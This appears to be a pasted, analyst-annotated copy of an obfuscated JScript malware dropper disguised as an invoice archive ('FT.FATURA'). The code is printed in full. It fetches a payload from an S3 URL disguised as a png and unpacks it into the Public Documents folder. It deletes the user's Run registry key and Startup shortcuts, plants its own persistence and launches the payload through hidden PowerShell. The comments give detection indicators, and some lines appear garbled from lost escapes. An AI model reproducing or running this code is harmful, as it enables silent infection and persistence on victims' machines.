1ZRR4H

FT.FATURA.ERKUNSWPAZIDNQJURBDPG.zip

Feb 3rd, 2021 (edited)
  // Analyst note: string table of an obfuscated Windows Script Host (JScript) dropper.
  // Assigned without var/let/const, so it becomes an implicit global.
  // Every COM ProgID, method name, path, registry key and URL used later is stored here
  // and fetched by numeric index through _0x1771 once the array has been rotated.
  // Indicators readable directly from the table: an S3-hosted URL ending in bretas.png,
  // both spellings of the per-user Run key path, 'rundll32.exe', 'powershell.exe',
  // 'Start-Sleep -s 60;Invoke-Item ' and a WinHttp.WinHttpRequest.5.1 ProgID written with
  // space/@ padding that later code strips (this defeats naive string matching).
  // The entries that begin with digits appear to be used only by the rotation checksum.
  1. _0x150f = ['HKCU\software\Microsoft\Windows\CurrentVersion\Run', 'Start-Sleep -s 60;Invoke-Item ', 'powershell.exe cd\;cd ', 'FolderExists', 'https://hipermercado.s3-sa-east-1.amazonaws.com/bretas.png', 'winmgmts: {  impersonationLevel=impersonate}/./root/default:StdRegProv', '.bmp', 'zip', '..com..exe..exe', '143981hnmxmp', 'length', 'replace', 'ABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚ', 'WorkingDirectory', 'CopyHere', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'MoveFile', 'Hotkey', 'close', 'UserName', '\Documents', 'charAt', 'getFolder', '929288uncNII', 'Save', 'type', 'ABCDEFGHIJLMNOPQRSTVXZWKY', 'saveToFile', 'Shell.Application', 'GET', 'send', 'FileExists', '.lnk', '319714vmPnfG', 'WScript.Shell', 'DeleteFile', '409000NRQoch', 'Position', '352816eNyfiH', '1eWRofM', 'open', '\*.lnk', 'TargetPath', 'rundll32.exe', 'Run', 'SpecialFolders', 'expandenvironmentstrings', '117637nwofHY', 'CreateFolder', 'REG_SZ', 'Description', 'NameSpace', 'MoveFolder', 'RegWrite', 'floor', 'ABCDEFGHIJLMNOPQRSTUVXZWKY', 'responseBody', 'Items', ' @ W i n H t t p . W i n H t t p R e q u e s t . 5 . 1 @ ', '1GzCfLO', '', 'random', 'CreateShortcut', 'write', ' @ p u b l i c @ ', 'Path', '317619ALeOcQ'];
  // String-table decoder: subtracts the fixed offset 0x85 from its first argument and
  // returns that slot of _0x150f. The second parameter is never read.
  // Because the table is rotated before first real use, the index alone does not
  // identify a string; the rotation count has to be recovered first.
  2. var _0x1771 = function(_0x515f7e, _0x122f34)  {
  3.       _0x515f7e = _0x515f7e - 0x85;
  4.       var _0x150f71 = _0x150f[_0x515f7e];
  5.       return _0x150f71;
  6.  
  7. };
  // _0x2cfef8 is the alias of the decoder that all later code calls.
  8. var _0x2cfef8 = _0x1771;
  // Self-invoking rotation routine, called with the string table and the target 0x33213.
  // Each pass combines nine parseInt()-ed table entries; if the result is not the target,
  // or if evaluation throws, the first element is shifted off and pushed to the end.
  // Worked by hand from the values on this page: the sum equals 0x33213 (209427) after
  // 40 rotations, so decoder(x) resolves to original entry (x - 0x85 + 40) mod 67,
  // e.g. 0x93 -> 'floor', 0x9a -> 'random', 0xa4 -> the bretas.png URL.
  9. (function(_0x2ad673, _0x15665b)  {
  10.       var _0x235709 = _0x1771;    while (!![])  {
  11.             try  {
  12.                   var _0x4733ac = parseInt(_0x235709(0xc6)) + -parseInt(_0x235709(0xc7)) * parseInt(_0x235709(0xa9)) + parseInt(_0x235709(0x98)) * parseInt(_0x235709(0x8c)) + -parseInt(_0x235709(0x9f)) + -parseInt(_0x235709(0xc4)) + -parseInt(_0x235709(0xc1)) + parseInt(_0x235709(0xb7));            if (_0x4733ac === _0x15665b) break;            else _0x2ad673['push'](_0x2ad673['shift']());        
  13.     }
  14.      catch (_0x5f30d7)  {
  15.                   _0x2ad673['push'](_0x2ad673['shift']());        
  16.     }
  17.        
  18.   }
  19.  
  20. }
  21.  
  22. (_0x150f, 0x33213));
  // Configuration and COM set-up (indices resolved with the rotation described at the decoder):
  //   CIF5QTNOFKZ  = the bretas.png URL (download source); C2IBEO6AEZU = '' is appended to it later.
  //   CJIGUQBIZMA  = ' @ p u b l i c @ ' + '\Documents'; '@' becomes '%' and spaces are removed,
  //                  then WScript.Shell expandenvironmentstrings() expands it, giving the drop
  //                  directory under the Public user's Documents folder.
  //   C907JPHCYY5  = the padded WinHttp string with '@' and spaces removed, i.e. the
  //                  WinHttp.WinHttpRequest.5.1 ProgID.
  //   CVOI2IDSNAI  = 'GET'; CDLOMW8GHKE = 'zip'; CZBJIHIF8OD = the 'HKCU\software\...\Run' path.
  //   CLAWXAPA8DV  = 'Avira.exe' and CATUVQTPLEC = 'rundll32.exe': file names that
  //                  CRCJB9L754C expects inside the unpacked archive and renames.
  //   CTRFN2PXMEA, CTRFN2PXMEA2, C39IWNL8KCT, keynum, keyfolderlist = alphabets for the
  //                  random-name helpers; keyext is the empty string.
  // COM objects created here: wscript.shell (several instances), scripting.filesystemobject,
  // Shell.Application and WScript.Network. The user and computer names are read and
  // concatenated, but those two values are not referenced again in the code shown.
  // NOTE(review): the paste appears to have lost backslash escapes (e.g. the lone '\' string
  // and the /\/g pattern near the end), so this line does not parse exactly as displayed.
  // Detection angle: a script host instantiating WinHttp, ADODB.Stream and Shell.Application
  // together, with a working path under %PUBLIC%\Documents, is a strong dropper signal.
  23. var CIF5QTNOFKZ = _0x2cfef8(0xa4),    C2IBEO6AEZU = '',    COK7ZHYJUNV = _0x2cfef8(0xb4),    CJIGUQBIZMA = _0x2cfef8(0x9d) + COK7ZHYJUNV,    CCZQNDWCXO7 = _0x2cfef8(0x99),    CFJPMCL7AEG = '',    CXVUAYDQAOX = '',    CL79PXZWYXB = 'wscript.shell',    CZC85F7AYW9 = _0x2cfef8(0xbc),    C907JPHCYY5 = _0x2cfef8(0x97),    CLG5QKHFYB1 = 'scripting.filesystemobject',    CVOI2IDSNAI = _0x2cfef8(0xbd),    CGVGGTPUMCE = 'Adodb.Stream',    keynum = _0x2cfef8(0x94),    CTRFN2PXMEA = _0x2cfef8(0xba),    CTRFN2PXMEA2 = _0x2cfef8(0xac),    C39IWNL8KCT = _0x2cfef8(0x94),    keyfolderlist = _0x2cfef8(0x94),    keyext = '',    CEEHDXXAKEP = '',    i = 0x0,    CZBJIHIF8OD = _0x2cfef8(0xa0),    CVIMYZPVDWX = 'C:\Windows\System32\cmd.exe@/k@cd\@&@cd@',    C935KOYEAEH = '',    CATUVQTPLEC = _0x2cfef8(0x88),    CLAWXAPA8DV = 'Avira.exe',    CDLOMW8GHKE = _0x2cfef8(0xa7),    CJIGUQBIZMA = CJIGUQBIZMA['replace'](/@/g, '%');CJIGUQBIZMA = CJIGUQBIZMA['replace'](/ /g, '');var C907JPHCYY5 = C907JPHCYY5[_0x2cfef8(0xab)](/@/g, '');C907JPHCYY5 = C907JPHCYY5[_0x2cfef8(0xab)](/ /g, '');var C1TMZ5RJ7ZB = new ActiveXObject(CL79PXZWYXB),    pshell = new ActiveXObject(CL79PXZWYXB),    CZ7XBLKD8FR = new ActiveXObject(CLG5QKHFYB1),    C7P0OVXQVE9 = new ActiveXObject(CZC85F7AYW9),    CPNXEGSNLDG = new ActiveXObject(CL79PXZWYXB),    network = new ActiveXObject('WScript.Network'),    userpc = network[_0x2cfef8(0xb3)],    namepc = network['computerName'],    userCEOMCJEBKEY = namepc + ' ' + userpc,    CEOMCJEBKEYuser = userpc + ' ' + namepc;CJIGUQBIZMA = C1TMZ5RJ7ZB[_0x2cfef8(0x8b)](CJIGUQBIZMA) + '\', CJIGUQBIZMA = CJIGUQBIZMA[_0x2cfef8(0xab)](/\/g, '@'), CJIGUQBIZMA = CJIGUQBIZMA[_0x2cfef8(0xab)](/@/g, '\' + '\');
  24.  
  // Random-name helper: returns a string of _0x1225b7 characters, each picked with
  // Math.floor(Math.random() * length) from the alphabet in CTRFN2PXMEA
  // ('ABCDEFGHIJLMNOPQRSTVXZWKY' once decoded). The loop counter is the global i.
  // Analyst note: names built this way change on every run, so file-name indicators
  // from one execution will not match the next.
  25. function CGAJQSGKQFO(_0x1225b7)  {
  26.      var _0x22517e = _0x2cfef8,        _0x4058c7 = '';    for (i = 0x0; i < _0x1225b7; i++)  {
  27.            _0x4058c7 += CTRFN2PXMEA['charAt'](Math[_0x22517e(0x93)](Math[_0x22517e(0x9a)]() * CTRFN2PXMEA[_0x22517e(0xaa)]));    
  28.  }
  29.      return _0x4058c7;
  30. }
  31.  
  32.  
  33.  
  // Same random-string routine as CGAJQSGKQFO, but drawing from CTRFN2PXMEA2, the long
  // table entry that repeats the Latin alphabet together with accented capitals.
  // Returns _0x3da8b2 characters; the loop counter is the global i.
  // It is called once in the code shown, to build the 35-character stem of the renamed
  // executable.
  34. function CGAJQSGKQFO2(_0x3da8b2)  {
  35.      var _0x10c98f = _0x2cfef8,        _0x1d6c09 = '';    for (i = 0x0; i < _0x3da8b2; i++)  {
  36.            _0x1d6c09 += CTRFN2PXMEA2[_0x10c98f(0xb5)](Math[_0x10c98f(0x93)](Math[_0x10c98f(0x9a)]() * CTRFN2PXMEA2['length']));    
  37.  }
  38.      return _0x1d6c09;
  39. }
  40.  
  41.  
  42.  
  // Random-string routine over the alphabet in C39IWNL8KCT. Unlike its siblings it
  // accumulates into the global CEEHDXXAKEP (reset to '' on entry) and returns that
  // global, so the last generated value stays readable after the call.
  // The loop counter is the global i.
  43. function C1LHGDGJCPW(_0x5da6cc)  {
  44.      var _0x8f82f1 = _0x2cfef8;    CEEHDXXAKEP = '';    for (i = 0x0; i < _0x5da6cc; i++)  {
  45.            CEEHDXXAKEP += C39IWNL8KCT['charAt'](Math['floor'](Math[_0x8f82f1(0x9a)]() * C39IWNL8KCT[_0x8f82f1(0xaa)]));    
  46.  }
  47.      return CEEHDXXAKEP;
  48. }
  49.  
  50.  
  51.  
  // Random-string routine over keyfolderlist ('ABCDEFGHIJLMNOPQRSTUVXZWKY' once decoded).
  // Returns _0x304876 characters; the loop counter is the global i.
  // The visible callers use it for the final folder name (idnova) and for idstart1.
  52. function gpastas(_0x304876)  {
  53.      var _0x282f00 = _0x2cfef8,        _0x3546af = '';    for (i = 0x0; i < _0x304876; i++)  {
  54.            _0x3546af += keyfolderlist[_0x282f00(0xb5)](Math[_0x282f00(0x93)](Math[_0x282f00(0x9a)]() * keyfolderlist['length']));    
  55.  }
  56.      return _0x3546af;
  57. }
  58.  
  59.  
  60.  
  // Random-string routine over keyext. keyext is initialised to '' and is not reassigned
  // in the code shown, so every charAt() call yields '' and the function returns an
  // empty string whatever length is requested. The loop counter is the global i.
  61. function ext(_0x1c28cf)  {
  62.      var _0x22a853 = _0x2cfef8,        _0x81ea8a = '';    for (i = 0x0; i < _0x1c28cf; i++)  {
  63.            _0x81ea8a += keyext[_0x22a853(0xb5)](Math['floor'](Math[_0x22a853(0x9a)]() * keyext[_0x22a853(0xaa)]));    
  64.  }
  65.      return _0x81ea8a;
  66. }
  67.  
  68.  
  69.  
  // Random-string routine over keynum, which holds the same letter alphabet as
  // keyfolderlist (not digits, despite the variable name). Returns _0x457496 characters;
  // the loop counter is the global i. No call to this function appears in the code shown.
  70. function enumera(_0x457496)  {
  71.      var _0x57892a = _0x2cfef8,        _0x20d220 = '';    for (i = 0x0; i < _0x457496; i++)  {
  72.            _0x20d220 += keynum[_0x57892a(0xb5)](Math[_0x57892a(0x93)](Math[_0x57892a(0x9a)]() * keynum[_0x57892a(0xaa)]));    
  73.  }
  74.      return _0x20d220;
  75. }
  76.  
  // Name generation and persistence set-up, in execution order:
  //   - CFJPMCL7AEG: 10 random letters, reused as the registry value name, the shortcut
  //     name and the stem of the archive name.
  //   - strDesktop: despite its name, this is WScript.Shell SpecialFolders('Startup').
  //   - CXVUAYDQAOX: drop directory + 20 random letters (idnova) + ext(0xa), which is ''.
  //   - C935KOYEAEH: 35 random characters followed by '..com..exe..exe'.
  //   - CFQHYIRYLS3: '<X>_<X>_<X>.zip', where X is CFJPMCL7AEG each time.
  //   - CVIMYZPVDWX is cleared, so CPCJBDPFLY9 is simply '<Startup>\<X>.lnk'.
  //   - StdRegProv DeleteKey on HKCU 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run':
  //     this targets the whole per-user Run key, so autostart values already stored
  //     there would go with it.
  //   - RegWrite then creates the value '<X>' under that Run path, type REG_SZ, pointing
  //     at the shortcut path.
  //   - DeleteFile('<Startup>\*.lnk') removes every shortcut already in the Startup
  //     folder; the error is swallowed.
  //   - CreateShortcut writes '<Startup>\<X>.lnk' with TargetPath
  //     '<CXVUAYDQAOX>\<C935KOYEAEH>', WindowStyle 1 and WorkingDirectory = Startup.
  // idcopia, CIL8TEXSUF5 and idstart1 are generated but not referenced in the code shown.
  // NOTE(review): the //g patterns and the lone '\' strings look like characters lost
  // when the sample was pasted; as displayed, //g would start a line comment.
  // Detection angle: a script host deleting and recreating the HKCU Run key, wiping
  // Startup\*.lnk, and creating a shortcut whose target sits under %PUBLIC%\Documents
  // with a multi-extension file name.
  77. var idcopia = CGAJQSGKQFO(0x1),    CIL8TEXSUF5 = C1LHGDGJCPW(0x1),    CFJPMCL7AEG = CGAJQSGKQFO(0xa),    CBBUQPGHJXD = new ActiveXObject(CL79PXZWYXB),    china = new ActiveXObject(_0x2cfef8(0xc2)),    strDesktop = china[_0x2cfef8(0x8a)]('Startup'),    idnova = gpastas(0x4) + '' + gpastas(0x6) + '' + gpastas(0xa),    idstart1 = 'u' + gpastas(0xa),    CXVUAYDQAOX = CJIGUQBIZMA + idnova + '' + ext(0xa);C935KOYEAEH = CGAJQSGKQFO2(0x23) + _0x2cfef8(0xa8);var CEOMCJEBKEY = CFJPMCL7AEG + '_',    CWE704QBPU9 = CFJPMCL7AEG;CWE704QBPU9 = CWE704QBPU9[_0x2cfef8(0xab)](/ /g, ''), CIF5QTNOFKZ = CIF5QTNOFKZ[_0x2cfef8(0xab)](//g, ''), C2IBEO6AEZU = C2IBEO6AEZU[_0x2cfef8(0xab)](//g, ''), CZBJIHIF8OD = CZBJIHIF8OD[_0x2cfef8(0xab)](//g, ''), C935KOYEAEH = C935KOYEAEH[_0x2cfef8(0xab)](//g, ''), CVIMYZPVDWX = CVIMYZPVDWX[_0x2cfef8(0xab)](//g, ''), CVIMYZPVDWX = CVIMYZPVDWX[_0x2cfef8(0xab)](/@/g, ' ');var CFQHYIRYLS3 = CEOMCJEBKEY + CWE704QBPU9 + '_' + CFJPMCL7AEG + '.' + CDLOMW8GHKE,    CGIWUI9K9F9 = CFQHYIRYLS3;CVIMYZPVDWX = '';var CPCJBDPFLY9 = CVIMYZPVDWX + strDesktop + '\' + CFJPMCL7AEG + _0x2cfef8(0xc0);CPCJBDPFLY9 = CPCJBDPFLY9['replace'](//g, ''), CPCJBDPFLY9 = CPCJBDPFLY9['replace'](/@/g, ' '), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('\\', '@'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('\\', '@'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('\\', '@'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('\\', '@'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('@', '\'), CPCJBDPFLY9 = CPCJBDPFLY9['replace']('@', '\'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('@', '\'), CPCJBDPFLY9 = CPCJBDPFLY9['replace']('@', '\');var HKEY_CURRENT_USER = 0x80000001,    stdRegPro = _0x2cfef8(0xa5),    objReg = GetObject(stdRegPro),    strKeyPath = _0x2cfef8(0xaf);objReg['DeleteKey'](HKEY_CURRENT_USER, strKeyPath);var CVXUU5DR7Q2 = new ActiveXObject(CL79PXZWYXB);CVXUU5DR7Q2[_0x2cfef8(0x92)](CZBJIHIF8OD + '\' + CFJPMCL7AEG + '', '' + CPCJBDPFLY9 + '', _0x2cfef8(0x8e));try  {
  78.      CZ7XBLKD8FR[_0x2cfef8(0xc3)](strDesktop + _0x2cfef8(0x86));
  79. }
  80.  
  81. catch (_0x4ed379)  {}var oShellLink = china[_0x2cfef8(0x9b)](strDesktop + '\' + CFJPMCL7AEG + '.lnk');oShellLink[_0x2cfef8(0x87)] = CXVUAYDQAOX + '\' + C935KOYEAEH, oShellLink['WindowStyle'] = 0x1, oShellLink[_0x2cfef8(0xb1)] = '', oShellLink[_0x2cfef8(0x8f)] = '', oShellLink[_0x2cfef8(0xad)] = strDesktop, oShellLink[_0x2cfef8(0xb8)]();
  82.  
  // Unpack-and-stage routine.
  //   _0x4bcf82: path of the downloaded archive.
  //   _0x378240: folder to extract into; defaults to '.' and is created if missing.
  // Steps, all inside one try whose catch is empty (every failure is silent):
  //   1. Obtain Shell.Application NameSpace objects for the destination folder and for
  //      the archive. getFile() is called on the archive before the FileExists check.
  //   2. If the archive exists, CopyHere(Items(), 0x4 + 0x10) extracts it; 4 and 16 are
  //      the Shell copy flags for no progress dialog and yes-to-all.
  //   3. Delete the archive.
  //   4. MoveFile '<dest>\Avira.exe' to '<dest>\<C935KOYEAEH>' (random stem +
  //      '..com..exe..exe').
  //   5. MoveFile '<dest>\rundll32.exe' to '<dest>\<CFJPMCL7AEG>.bmp'.
  //   6. MoveFolder <dest> to CXVUAYDQAOX, the path the Startup shortcut targets.
  //   7. Build 'powershell.exe cd\;cd <Startup>;Start-Sleep -s 60;Invoke-Item <name>.lnk'
  //      and launch it with WScript.Shell Run(cmd, 0, false): hidden window, no wait.
  // NOTE(review): renaming a file called Avira.exe suggests the archive carries a
  // legitimately named binary, possibly for DLL side-loading - not confirmable from here.
  // NOTE(review): the ''' runs below look like quote escapes lost in the paste.
  // Detection angle: a script host spawning hidden powershell.exe with Start-Sleep
  // followed by Invoke-Item on a .lnk, plus renames to multi-extension names.
  83. function CRCJB9L754C(_0x4bcf82, _0x378240)  {
  84.      var _0x5f30f2 = _0x2cfef8;    try  {
  85.            var _0x546d2c = new ActiveXObject(CLG5QKHFYB1),            _0x15f3f9 = new ActiveXObject(CZC85F7AYW9),            _0x37d08e, _0x2d8d5c;        !_0x378240 && (_0x378240 = '.');        !_0x546d2c[_0x5f30f2(0xa3)](_0x378240) && _0x546d2c[_0x5f30f2(0x8d)](_0x378240);        _0x37d08e = _0x15f3f9[_0x5f30f2(0x90)](_0x546d2c[_0x5f30f2(0xb6)](_0x378240)[_0x5f30f2(0x9e)]), _0x2d8d5c = _0x15f3f9[_0x5f30f2(0x90)](_0x546d2c['getFile'](_0x4bcf82)['Path']);        if (_0x546d2c[_0x5f30f2(0xbf)](_0x4bcf82))  {
  86.                  _0x37d08e[_0x5f30f2(0xae)](_0x2d8d5c[_0x5f30f2(0x96)](), 0x4 + 0x10), _0x546d2c['DeleteFile'](_0x4bcf82), _0x546d2c[_0x5f30f2(0xb0)](_0x378240 + '\' + CLAWXAPA8DV, _0x378240 + '\' + C935KOYEAEH), _0x546d2c['MoveFile'](_0x378240 + '\' + CATUVQTPLEC, _0x378240 + '\' + CFJPMCL7AEG + _0x5f30f2(0xa6)), _0x546d2c[_0x5f30f2(0x91)](_0x378240, CXVUAYDQAOX);            var _0x138f42 = _0x5f30f2(0xa2) + ''' + strDesktop + ''' + ';' + _0x5f30f2(0xa1) + ''' + CFJPMCL7AEG + _0x5f30f2(0xc0) + ''';            C1TMZ5RJ7ZB[_0x5f30f2(0x89)](_0x138f42, 0x0, ![]);        
  87.    }
  88.        
  89.  }
  90.   catch (_0x392f94)  {}
  91. }
  92.  
  // Download stage. Creates the WinHttp.WinHttpRequest.5.1 object and issues a
  // synchronous GET (third argument false) to CIF5QTNOFKZ + C2IBEO6AEZU, i.e. the
  // bretas.png URL from the string table. Errors are swallowed by the empty catch.
  93. try  {
  94.      var CQXUKOWEUBT = new ActiveXObject(C907JPHCYY5);    CQXUKOWEUBT[_0x2cfef8(0x85)](CVOI2IDSNAI, CIF5QTNOFKZ + C2IBEO6AEZU, ![]), CQXUKOWEUBT[_0x2cfef8(0xbe)]();
  95. }
  96.  
  // Save-and-unpack stage. An Adodb.Stream is opened with type = 1 (binary), receives
  // responseBody, is rewound (Position = 0) and saved with mode 2 (overwrite) as
  // '<drop dir><X>_<X>_<X>.zip'. CRCJB9L754C is then called with that archive and the
  // extraction folder '<drop dir><X>'. Failures are again swallowed.
  // Analyst note: the resource is requested with a .png name but stored and handled as
  // a zip archive, so URL-extension filtering alone would not flag the transfer.
  // Detection angle: a script host fetching from cloud object storage via WinHttp and
  // writing an archive into %PUBLIC%\Documents.
  97. catch (_0x42ab0e)  {}try  {
  98.      var CGRKWFQW33B = new ActiveXObject(CGVGGTPUMCE);    CGRKWFQW33B[_0x2cfef8(0x85)](), CGRKWFQW33B[_0x2cfef8(0xb9)] = 0x1, CGRKWFQW33B[_0x2cfef8(0x9c)](CQXUKOWEUBT[_0x2cfef8(0x95)]), CGRKWFQW33B[_0x2cfef8(0xc5)] = 0x0, CGRKWFQW33B[_0x2cfef8(0xbb)](CJIGUQBIZMA + CFQHYIRYLS3, 0x2), CGRKWFQW33B[_0x2cfef8(0xb2)](), CRCJB9L754C(CJIGUQBIZMA + CFQHYIRYLS3, CJIGUQBIZMA + CFJPMCL7AEG);
  99. }
  100.  
  101. catch (_0x5e8d50)  {}
  102.  